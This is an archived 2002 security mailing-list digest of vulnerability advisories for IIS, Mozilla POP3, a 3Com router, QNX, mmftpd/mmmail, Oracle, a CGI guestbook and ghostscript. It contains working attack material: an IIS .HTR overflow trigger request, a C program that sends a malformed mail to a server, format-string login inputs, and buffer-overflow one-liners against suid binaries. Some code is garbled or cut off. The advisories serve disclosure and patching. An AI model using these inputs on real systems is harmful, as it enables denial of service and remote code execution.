ADVISORY: Windows 2000 and NT4 IIS .HTR Remote Buffer Overflow [AD20020612]

[Ryan Permeh]

Windows 2000 and NT4 IIS .HTR Remote Buffer Overflow

Release Date:
June 12, 2002

Severity:
High (Remote code execution)

Systems Affected:
Microsoft Windows NT 4.0 Internet Information Services 4.0
Microsoft Windows 2000 Internet Information Services 5.0

A vulnerability in transfer chunking, in combination with the processing of
HTR request sessions can be exploited to remotely execute code of an
attackers choice on the vulnerable machine. By sending a carefully crafted
session, an attacker can overwrite a section of the heap. Data structures in
the overwritten heap can be manipulated to move attacker-supplied data to
attacker supplied memory addresses, thereby altering the flow of execution
into an attacker supplied payload.

This is a very serious vulnerability and eEye suggests that administrators
install the Microsoft supplied patch as soon as possible.

The following example will show the vulnerable condition. The dllhost.exe
child process will silently die because the developers have replaced the
default exception filter. So if you want to examine this closer, load a
debugger up on the dllhost child process before you send this example
session over the wire.

**Begin Session
POST /EEYE.htr HTTP/1.1
Host: 0day.big5.com
Transfer-Encoding: chunked

20
EEYE2002
0
[enter]
[enter]
**End Session**

Technical Description:

The example session above overwrites a section of the heap that contains
data structures related to the memory management system. By manipulating the
content of these structures we can overwrite an arbitrary 4 bytes of memory
with an attacker supplied address.

While many may believe that the risk for these types of vulnerabilities is
fairly low due to the fact that addressing is dynamic and brute force
techniques would need to be use in an attack, eEye strongly disagrees. This
premise is false as successful exploitation can be made with one attempt,
across dll versions. An attacker can overwrite static global variables,
stored function pointers, process management structures, memory management
structures, or any number of data types that will allow him to gain control
of the target application in one session.

SecureIIS(tm) Application Firewall for Microsoft IIS

It should be noted that clients using any version of SecureIIS from eEye
Digital Security are secure from this vulnerability. This vulnerability was
discovered by the eEye team while testing a new version of SecureIIS to help
further its protection abilities from similar classes of attack. To learn
more visit http://www.eeye.com/SecureIIS

Vendor Status:
Microsoft has released a security bulletin and patch:
http://www.microsoft.com/technet/security/

Beyond installing the Microsoft security patch it is also recommend to
disable the .htr ISAPI filter if you have not already done so. Microsoft’s
security advisory references more information on the steps of how to disable
the .htr ISAPI filter.

Credit: Riley Hassell

Greetings: Caesar, K2, Dark Spyrit, Solar Designer, Joey, Halvar, Gera,
Scut, Ilfak Guilfanov. And last but not least, Kasia and Jenn ;) and as
always, www.securityfocus.com.

Copyright (c) 1998-2002 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent of
eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail [EMAIL PROTECTED] for
permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.

Feedback
Please send suggestions, updates, and comments to:

eEye Digital Security
http://www.eEye.com
[EMAIL PROTECTED]

Another small DoS on Mozilla <= 1.0 through pop3

[eldre8]

/ Strange Software Behaviour Report
///
 discovered, understood and exploited between 05, 08 2001
 (yes, i took the time... :) )
///  eldre8
Wed Jun 12 20:47:59 CEST 2002

\/\/\_/-> System affected:
Netscape v =<4.77
Mozilla <1.1

^\/\/'\-> System not affected:
Outlook Express 4.72.3110.5
maybe the other versions of Outlook

|_/\/\\/> Buggy software team contacted about this:
Yes, the bug is fixed now.

/\/\/\_/> Exploitation: remote & very easy & very anonymous :(

_/\/\/\_> Effects: With this remote hole, we can block any mail
box that is checked with a pop3 client, so the
hotmail, yahoo like servers are not affected.
A mail will cause the pop3 client to desynchronize
with the server, losing the connection to it, and
so, leaves all messages on the server (explain later)...

-/\/\/\/> Explanation: In the SMTP protocol, we can send mail with
some introduction command (ehlo,mail,rcpt) and then
type our messages and place a dot at a new line to
specify to the MTA that it is the end of the message.
On the other side, when a POP3 client check mail, it
connect to the server, retreive the mail, it terminate
the download of a message when it sees a dot at a new line.
And here is the trick.
If we can place a dot at a new line, and place other
words below this dot, the client will beleive the mail
is finished and will try to download next messages, thus
beiing desynchronize with the server...
The POP3 client act as:
login on to the POP3 server
retrieve mails
delete mails
logout
but if it is desynchronize, it will retreive mail, and
disconnect, thus didn't delete mails, and the next time
it login, it will refind the same mail, will retreive one
more time the mails, disconnect, and other and other...
A more detailed explanation,
here it is a simple end of a normal mail:
blabla...
\x0a
\x0a
and this is the bad mail:
blabla...
\x0a\x0d\x2e\x0d\x20\x0a\x0a\x0a
blabla...
\x0a\x20\x00
\x0a
We can see at the end of the two 0x0a, it seems that it is just
place here by the console...forget it.
At this stage, you could catch the bug...

=\/\/\/-> Possible fixes: There are different ways to fix this,
- one way is from the client, to stop the bad mail,
this is to connect manually via telnet to the pop3
server, and then identify the bad message and do a
dele <# of the message>
- one better way is to fix this from the client itself,
the client can get the size of each messages via
the list command, so it should be able to retrieve
the complete message, not less, not more...
- one way is to fix the MTA so it will not accept such
the code below...

~\/\/\/~> (buggy:])Exploit:

/* this is the code that comes with my
 * advisory #1 to illustrate this...
 * eldre8 at afturgurluk (double dot minus one) org
 */

#include
#include
#include
#include
#include
#include
#include
#include

#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root@localhost\r\n"
#define RCPT "RCPT TO: root@localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"

#define PORT 25

int sock;
char buffer[255];

void SigCatch() {
fprintf(stderr, "\b\bbye!\n");
close(sock);
exit(0);
}

int main() {
/* I was too lame to implement the command line... :) */
int i;
struct sockaddr_in sout;
struct hostent *hp;

signal(SIGINT, SigCatch);

hp=gethostbyname(MX);
sock=socket(AF_INET, SOCK_STREAM, 0);
if (sock<0) {
perror("sock");
return -1;
}

sout.sin_family=AF_INET;
sout.sin_port=htons(PORT);
memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
if (connect(sock, &sout, sizeof(sout))<0) {
perror("connect");
return -1;
}
recv(sock, buffer, 255, 0); /* receive the banner... */
send(sock, EHLO, sizeof(EHLO), 0);
recv(sock, buffer, 255, 0); /* receive the welcome message... */
send(sock, MAIL, sizeof(MAIL), 0);
recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
send(sock, RCPT, sizeof(RCPT), 0);
recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
send(sock, DATA, sizeof(DATA), 0);
recv(sock, buffer, 255, 0);
i=sprintf(buffer, "b4d maIl 1n 
4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
*(buffer+i)="\x0";
sprintf(buffer+i+1, "\n.\n");
send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
recv(sock, buffer, 255, 0);
send(sock, QUIT, sizeof(QUIT), 0);
recv(sock, buf

Part II: Vulnerability in 3Com® OfficeConnect® Remote 812 ADSL Router

[Ismael Briones]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


TITLE: A more detailed description of 3Com ® OfficeConnect® Remote 812 ADSL
Router

DESCRIPTION: A big description of the vulnerability, Status and Solutions.
I send this mail to explain the real problem and the solutions to all these 
people that were interested in the bug.

Thanks to all people that has sent me a email with theirs experienced

PROBLEM SUMMARY:

In the previous mail, I advertised about a problem in PAT(Port 
Address Translation) that can be used to access all ports in the computer 
behind the router. [EMAIL PROTECTED] inform me about a feature called iNAT 
or iPAT (Intelligent NAT/PAT. I think this should be called Stupid NAT/PAT).
With this feature, when a connection is established from a computer 
behind the router with a remote computer, the router redirects all the 
connections from the remote computer to the computer that initiate the 
connection behind the router, even if the ports aren't redirected whith PAT.
Somebody from 3Com Europe sent me a mail with the same explanation, 
and write a text extracted from 812CLI (Version 2.0) documentation (see 
attachment). But iNAT/PAT really has a bug.

BUG:
When we try to connect to a port that is not redirected to a computer 
behind the router using iPAT, there is no problem, the router doesn't allow 
this connection. But if before we connect to a port redirected using iPAT and 
inmediately we try to connect to any port not redirected using iPAT, the 
router allows the successive connections to any port, redirecting the 
connections to the internal computer. The problem exists with TCP and with 
UDP. The problem exists when iPAT is enable (It is enable by default) and it 
isn't a feature, it is a bug.
A lot of people sent me mails saying that this is a feature called iNAT, but 
the iNAT isn't working as it should.

SOLUTIONS:

Disable iNAT/PAT (Caution: Some programs, like NetMeeting may not 
work). There is an unoficial version of the firmware (version 2.1.2) at 
http://www.adslnet.ws/ ( http://es.geocities.com/doelgroup/mr020102.zip ) 
that seems not to have the bug. If somebody tries it, make me know, 
please.


- -- 
- --
Ismael Briones VilarMundinteractivos - El Mundo  
Area de InternetPradillo, 42 
[EMAIL PROTECTED] 28002 - Madrid (SPAIN, EU)   
http://www.elmundo.es/  Tel: (+34) 915864800 (Ext: 4615) 
Fax: (+34) 915864480
- --
GPG PubKey:
fingerprint: 8FD8 1450 29AC 5B5F 4186  0417 B67A 978F 281C D54F
http://pgp.rediris.es:11371/pks/lookup?op=get&search=0x281CD54F
- --

"Este negocio, es un organismo vivo. Se multiplica sin cesar
rodeado por depredadores. No hay cabida para tiempo ocioso ni vacilaciones.
Nuevos descubrimientos nos inundan, nuevas ideas, listas para ser devoradas,
redefinidas. Este negocio en binario. Eres un uno o un cero, vives o 
mueres"
Gary Winston (AntiTrust)

"Good artists copy, great artists steal."
  Pablo Picasso


-BEGIN PGP SIGNATURE-
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE9B4IatnqXjygc1U8RAu/QAKCfF8K299YHckLKa6MYVWHRORXFHwCfR+xy
/fm65CLKYVDrz04gR1hFO34=
=f5/8
-END PGP SIGNATURE-

madcr: QnX 4.25 - multiples bof in suid/no suid files

[Egor Egorov]

/bin/sample
//--
# cd /bin
# ls -l sample
-rwsrwxr-x  1 root  root  20639 Jan 19  1996 sample
# sample `perl -e 'print "A" x 280'`
Profile based upon 2000 samples/second.

//1/bin/sample terminated (SIGSEGV) at 0005:0041
%1  672  Memory fault  sample $(perl -e 'print "A" x 280')

# wd sample 'perl -e print "A" x 280'`
ebp: 41414141
eip: 0041

# wd sample 'perl -e 'print "A" x 280, "B"'`
ebp: 41414141
eip: 4241
//--


/bin/ex
//--
# wd ex `perl -e 'print "AAA" x 420, "good", "CCC" x 280'`
ebp: 0041
eip: 646f6f67 - doog
//--

 file   bytes for bof

/bin/du   - 558
/bin/find - 799
/bin/lex  - 1673
/bin/mkdir- 517
/bin/rm   - 351
/bin/serserv  - 224
/bin/tcpserv  - 146
/bin/termdef  - 729
/bin/time - 2489
/bin/unzip- 299
/bin/use  - 1964
/bin/wcc  - 138
/bin/wcc386   - 137
/bin/wd   -
/bin/wdisasm  - 135
/bin/which- 304
/bin/wlib - 256
/bin/wlink- 10244
/bin/wpp  - 256
/bin/wpp386   - 256
/bin/wprof- 141
/bin/write- 157
/bin/wstrip   - 817

[CERT-intexxia] mmftpd FTP Daemon Format String Vulnerability

[Benoît Roussel]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


SECURITY ADVISORYINTEXXIA(c)
04 06 2002   ID #1053-040602

TITLE   : mmftpd FTP Daemon Format String Vulnerability
CREDITS : Guillaume Pelat / INTEXXIA



SYSTEM AFFECTED
===

mmftpd <= 0.0.7





DESCRIPTION
===

"mmftpd is a  secure FTP server  that runs as a normal user, and
supports  virtual  users  only. Each user may have specific permissions,
including  the  maximum  home  directory  size limit and download/upload
speeds. It runs on both  BSD and Linux systems, and is ideal for a setup
with many  Web virtual host customers. It was written from scratch, with
no borrowed code."

The  Laboratory  intexxia  found  a  remotely exploitable format
string vulnerability in the mmftpd FTP deamon .





DETAILS
===

There  is  a  format  string  vulnerability  in the 'mmsyslog()'
function  of the  'mmftpd ' program. This function acts like 'vsyslog()'
if '__GLIBC__' is  defined.  It calls  the 'syslog(3)' function  with  a
format string that can be defined by a remote user. It is not  necessary
to authenticate to exploit this vulnerability.

Successful exploitation of this  flaw can  allow a remote user to obtain
a local account on the target machine.





PROOF OF CONCEPT


test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p 
331 Password required for this user
PASS foo
530 Invalid login

In the log file :
mmftpd[1875]: 3CFC80CF Failed login for 0x80598800x80ae73c (unexisting)

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 ftp.somehost.net FTP server (mmftpd (0.0.7/mmondor)) ready
USER %p%p%n
331 Password required for this user
PASS foo
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 21
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused





SOLUTION


The following patch corrects this issue :

diff -dru mmftpd-0.0.7/mmlib/mmlog.c mmftpd-0.0.7.fixed/mmlib/mmlog.c
- --- mmftpd-0.0.7/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmftpd-0.0.7.fixed/mmlib/mmlog.c Tue Jun  4 11:25:03 2002
@@ -70,7 +70,7 @@
  va_start(lst, fmt);
  vsnprintf(buf, 1023, fmt, lst);
  va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
 }
 }

A new version including this patch is available at the following URL :
http://mmondor.gobot.ca/software/linux/mmftpd-0.0.8.tar.gz





VENDOR STATUS
=

04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew   was  very   reactive  and  confirmed  the
 vulnerability. He released a new version.





LEGALS
==

mmftpd is registered trademark.


Intexxia provides this  information  as a public service and "as
is". Intexxia  will not be  held accountable for  any damage or distress
caused by the proper or improper usage of these materials.


(c) intexxia 2002. This  document is property  of intexxia. Feel
free to use and distribute  this material as long as  credit is given to
intexxia and the author.





CONTACT
===

CERT intexxia  [EMAIL PROTECTED]
INTEXXIA http://www.intexxia.com
171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - FranceFax : +33 1 55 69 78 80

-BEGIN PGP SIGNATURE-
Version: PGPfreeware 7.0.3 for non-commercial use 

iQA/AwUBPQdFek2N8BNyNDXLEQKEpACgt/bLhZ6ahg8ryeQZySgsAwfgrN0AoN1t
+RZxkiJQjPqx2M/035bKlMSq
=pRJF
-END PGP SIGNATURE-

Oracle TNS Listener Buffer Overflow (#NISR12062002A)

[NGSSoftware Insight Security Research]

NGSSoftware Insight Security Research Advisory

Name: Oracle TNS Listener Buffer Overflow
Systems: Windows and VM running all versions of Oracle 9i Database
Severity: High Risk
Category: Remote Buffer Overrun Vulnerability
Vendor URL: http://www.oracle.com/
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL: http://www.ngssoftware.com/advisories/oratns.txt
Date: 12th June 2002
Advisory number: #NISR12062002A
(VNA reference : http://www.nextgenss.com/vna/ora-lsnr.txt )

Description
***
The Oracle Net Listener contains a remotely exploitable buffer overrun
vulnerability that can allow an attacker to gain complete control of a
machine running the Oracle 9i Database.

Details
***
The Listener 'listens' on TCP port 1521 for client request to use the
database. On receiving a request the client is passed off to an instance of
the database. The request, packaged in a valid TNS packet is of the form

(DESCRIPTION=(ADDRESS=
(PROTOCOL=TCP)(HOST=x.x.x.x)
(PORT=1521))(CONNECT_DATA=
(SERVICE_NAME=myorcl.ngssoftware.com)
(CID=
(PROGRAM=X:\\ORACLE\\iSuites\\BIN\\SQLPLUSW.EXE)
(HOST=foo)(USER=bar

By supplying an overly long SERVICE_NAME parameter, when forming an error
message to be written to the log file, a saved return address on the stack
is overwritten thus gaining control over the processes execution. Any code
supplied by the attacker will run, by default, in the context of the Local
SYSTEM account on Windows platforms and as such is a high risk
vulnerability. Because the overflow occurs before the error message is
actually written to the log file it may be difficult to detect if an attack
has occured. Customers are advised to patch this as soon as is possible.


Fix Information
***
NGSSoftware alerted Oracle to this problem on the 13th of May and Oracle
have now released patches which are available from the Metalink site. The
patch number is 2367681.

A check for this vulnerability has been added to Typhon II, NGSSoftware's
vulnerability assessment scanner, of which, more information is available
from the NGSSite, http://www.ngssoftware.com/

Oracle Reports Server Buffer Overflow (#NISR12062002B)

[NGSSoftware Insight Security Research]

NGSSoftware Insight Security Research Advisory

Name: Oracle 9iAS Reports Server
Systems: All
Severity: High Risk
Category: Remote Buffer Overrun Vulnerability
Vendor URL: http://www.oracle.com/
Author: David Litchfield ([EMAIL PROTECTED])
Advisory URL: http://www.ngssoftware.com/advisories/orarep.txt
Date: 12th June 2002
Advisory number: #NISR12062002B
(VNA Reference: http://www.nextgenss.com/vna/ora-reports.txt )

Description
***
Oracle's Report Server contains a remotely exploitable buffer overrun
vulnerability in one of its CGI based programs.

Details
***
By supplying an overly long database name parameter to the rwcgi60 with the
setauth method, a remote attacker can overwrite a saved return address on
the stack, gaining control over the processes execution.

Any exploit code supplied by the attacker will run in the security context
of account the web server is running as. Normally on platforms running a
unix variant the account has limited privileges; However, on Windows based
system the web server, by default, runs in the context of the local SYSTEM
account.

Fix Information
***
NGSSoftware alerted Oracle to this problem on December the 17th 2001 and
Oracle have now released patches which are available from the Metalink site.
The patch number is 2356680.

[CERT-intexxia] mmmail POP3-SMTP Daemon Format String Vulnerability

[Benoît Roussel]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1


SECURITY ADVISORYINTEXXIA(c)
04 06 2002   ID #1054-040602

TITLE   : mmmail POP3-SMTP Daemon Format String Vulnerability
CREDITS : Guillaume Pelat / INTEXXIA



SYSTEM AFFECTED
===

mmmail <= 0.0.13 (mmpop3d & mmsmtpd)





DESCRIPTION
===

"mmmail provides  SMTP and  POP3 daemons using MySQL, running as
a  non-root  user.  It  also supports bandwidth shaping. Relaying is not
supported, although  it has  been designed  to handle many users on many
virtual hosts. It is fast and secure, uses threads, and has been written
entirely from scratch and does not rely on mbox or Maildir formats."

mmmail  includes  2  daemons,  mmpop3d  and  mmsmtpd.  Both  are
vulnerable to a remotely exploitable format string issue.





DETAILS
===

There  is  a  format  string  vulnerability  in the 'mmsyslog()'
function of  the 'mmpop3d'  and 'mmsmtpd'  programs. This  function acts
like 'vsyslog()' if '__GLIBC__' is  defined.  It  calls  the 'syslog(3)'
function with  a format  string that can be defined by a remote user. It
is not necessary to authenticate to exploit this vulnerability.

Successful exploitation of this  flaw can  allow a remote user to obtain
a local account on the target machine.





PROOF OF CONCEPT


mmpop3d
- ---

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %p%p
- -ERR Invalid username

In the log file :
mmpop3d[2165]: 3CFC8B53 USER 0x8052f620x80a44fc

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
+OK pop3.somehost.net (mmpop3d (mmmail-0.0.13/mmondor)) Service ready
USER %s%s%n
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 110
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused


mmsmtpd
- ---
test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %p%p
501 Invalid hostname

In the log file :
mmsmtpd[2188]: 3CFC8BF9 HELO 0x8052e360x80a447c

test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
Connected to test.lab.intexxia.com.
Escape character is '^]'.
220 smtp.somehost.net (mmsmtpd (mmmail-0.0.13/mmondor)) Service ready
HELO %s%s%n
Connection closed by foreign host.

test:~$ telnet test.lab.intexxia.com 25
Trying x.x.x.x...
telnet: Unable to connect to remote host: Connection refused





SOLUTION


The following patch corrects this issue :

iff -dru mmmail-0.0.13/mmlib/mmlog.c mmmail-0.0.13.fixed/mmlib/mmlog.c
- --- mmmail-0.0.13/mmlib/mmlog.c Mon May 13 08:20:13 2002
+++ mmmail-0.0.13.fixed/mmlib/mmlog.c Tue Jun  4 12:37:19 2002
@@ -70,7 +70,7 @@
  va_start(lst, fmt);
  vsnprintf(buf, 1023, fmt, lst);
  va_end(lst);
- - syslog(LOG_NOTICE, buf);
+ syslog(LOG_NOTICE, "%s", buf);
 }
 }

A new version including this patch is available at the following URL :
http://mmondor.gobot.ca/software/linux/mmmail-0.0.14.tar.gz





VENDOR STATUS
=

04-06-2002 : This bulletin was sent to Matthew Mondor.
05-06-2002 : Matthew   was  very   reactive  and  confirmed  the
 vulnerability. He released a new version.





LEGALS
==

mmmail is a registered trademark.


Intexxia provides this  information  as a public service and "as
is". Intexxia  will not be  held accountable for  any damage or distress
caused by the proper or improper usage of these materials.


(c) intexxia 2002. This  document is property  of intexxia. Feel
free to use and distribute  this material as long as  credit is given to
intexxia and the author.





CONTACT
===

CERT intexxia  [EMAIL PROTECTED]
INTEXXIA http://www.intexxia.com
171, av. Georges Clemenceau Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France  

SSI & CSS execution in MakeBook 2.2

[DownBload]

  [ DownBload Security Research Lab Advisory ]
[-]
Advisory name: SSI & CSS execution in MakeBook 2.2
Advisory number: 5  
Application: MakeBook 2.2 (CGI script)
Application author: Kristina Pfaff-Harris 
Source: http://www.tesol.net/scriptmail.html
Date: 12.6.2002 
Impact: remote user can execute shell commands & cross site scripting 
Tested on: Debian 2.1 (2.0.36 kernel), Apache web server - version 1.3.4
Discovered by: DownBload
Mail me @: [EMAIL PROTECTED]




--[ Overview 

"...MakeBook v2.2 is a simple program which can be used as a guestbook,
an ongoing writing project where each person adds to an ongoing story,
a comment board, or even a way to let people add comments to many
individual pages.  It allows a user to enter their name, email address,
and some text which will then be added to the "bookfile".  Originally
intended for use in writing a continuing story or journal, where
different students could add to the story as they went along, it has
evolved into a more flexible system which allows the owner to choose
how the "book" entries should appear, and even what pages they appear 
on..."


   

--[ Problem 

Our dear Kristina wrote an advanced CGI guestbook, in perl ofcorse. 
It works fine, but troubles comes when you look for security measures in 
program. When you want to sign guestbook, you have to write your name,
email address, and some text. Script does remove 'some' special-char in 
$text, but script doesn't replace special-chars in $name at all, and 
because
of that, it is possible instead of name, enter and execute some SSI(Server
Side Includes) or CSS(Cross Site Scripting) code.
'Buggy' code:
...
$name =$data{"Name"};
$email =$data{"Email"};
$text =$data{"Text"};
$text =~ s//>/g;
...




--[ Examples

SSI attack
~~
Name: 
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

CSS attack
~~
Name: 
E-mail: [EMAIL PROTECTED]
Text: I hacked you, my kung-fu is the best... ;)

I won't give you more examples, use your own imagination :).
BTW: SSI attack depends on web server, because some web servers
comes with, and some without support for SSI.




--[ Solution 

Solution for this bug would be to filter special characters from user
input. For now, you can use this:

...
$name  = $data{"Name"};
$name  =~ s//>/g;

$email = $data{"Email"};
$email =~ s//>/g;

$text = $data{"Text"};
$text =~ s//>/g;
...




--[ Greetz

Greetz goes to #hr.hackers .
Special greetz goes to Kristina Pfaff-Harris (ladies first), BoyScout, 
h4z4rd, fi, Fr1c, harlequin and www.active-security.org.

Security Update: [CSSA-2002-026.0] Linux: ghostscript arbitrary command execution

[security]

To: [EMAIL PROTECTED] [EMAIL PROTECTED] 
[EMAIL PROTECTED]


__

Caldera International, Inc.  Security Advisory

Subject:Linux: ghostscript arbitrary command execution
Advisory number:CSSA-2002-026.0
Issue date: 2002 June 11
Cross reference:
__


1. Problem Description

An untrusted PostScript file that uses .locksafe or .setsafe to
reset the current page device can force the ghostscript program
to execute arbitrary commands.


2. Vulnerable Supported Versions

System  Package
--

OpenLinux 3.1.1 Server  prior to ghostscript-6.51-10.i386.rpm
prior to ghostscript-doc-6.51-10.i386.rpm
prior to ghostscript-fonts-6.51-10.i386.rpm
prior to ghostscript-fonts-cid-6.51-10.i386.rpm

OpenLinux 3.1.1 Workstation prior to ghostscript-6.51-10.i386.rpm
prior to ghostscript-doc-6.51-10.i386.rpm
prior to ghostscript-fonts-6.51-10.i386.rpm
prior to ghostscript-fonts-cid-6.51-10.i386.rpm

OpenLinux 3.1 Serverprior to ghostscript-6.51-10.i386.rpm
prior to ghostscript-doc-6.51-10.i386.rpm
prior to ghostscript-fonts-6.51-10.i386.rpm
prior to ghostscript-fonts-cid-6.51-10.i386.rpm

OpenLinux 3.1 Workstation   prior to ghostscript-6.51-10.i386.rpm
prior to ghostscript-doc-6.51-10.i386.rpm
prior to ghostscript-fonts-6.51-10.i386.rpm
prior to ghostscript-fonts-cid-6.51-10.i386.rpm


3. Solution

The proper solution is to install the latest packages.


4. OpenLinux 3.1.1 Server

4.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/RPMS

4.2 Packages

cfabdbccacd4de0268ce15d1dd6a0408ghostscript-6.51-10.i386.rpm
f9bb38edc64d718f8b943d395de7c75aghostscript-doc-6.51-10.i386.rpm
70a913d9427ce45367710498bab8e065ghostscript-fonts-6.51-10.i386.rpm
9e2f736b44b9bfa60e51c24847637d48ghostscript-fonts-cid-6.51-10.i386.rpm

4.3 Installation

rpm -Fvh ghostscript-6.51-10.i386.rpm
rpm -Fvh ghostscript-doc-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-cid-6.51-10.i386.rpm

4.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Server/current/SRPMS

4.5 Source Packages

dba70bda415835cca29139d565936b3fghostscript-6.51-10.src.rpm


5. OpenLinux 3.1.1 Workstation

5.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/RPMS

5.2 Packages

f8a0bf41a7dd801f6f98d50134143fbdghostscript-6.51-10.i386.rpm
a2d8fbd76bc080146b1a1a964a218850ghostscript-doc-6.51-10.i386.rpm
bccaab1b0a9005ea7d36173e296b444eghostscript-fonts-6.51-10.i386.rpm
dadf94bb7c6091cfb32d650a61e8864dghostscript-fonts-cid-6.51-10.i386.rpm

5.3 Installation

rpm -Fvh ghostscript-6.51-10.i386.rpm
rpm -Fvh ghostscript-doc-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-cid-6.51-10.i386.rpm

5.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1.1/Workstation/current/SRPMS

5.5 Source Packages

38ebafe42e38f5eae8207c4f52bbb90dghostscript-6.51-10.src.rpm


6. OpenLinux 3.1 Server

6.1 Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS

6.2 Packages

12aa5320c2331010736ce36a9fc1ef3dghostscript-6.51-10.i386.rpm
1a40569d1a9598df507faae191e68c48ghostscript-doc-6.51-10.i386.rpm
f44b0f45f4864d2b357b02642c4cd249ghostscript-fonts-6.51-10.i386.rpm
e28affd61ec6bdc19e136c1355307e90ghostscript-fonts-cid-6.51-10.i386.rpm

6.3 Installation

rpm -Fvh ghostscript-6.51-10.i386.rpm
rpm -Fvh ghostscript-doc-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-6.51-10.i386.rpm
rpm -Fvh ghostscript-fonts-cid-6.51-10.i386.rpm

6.4 Source Package Location

ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS

6.5 Source Packages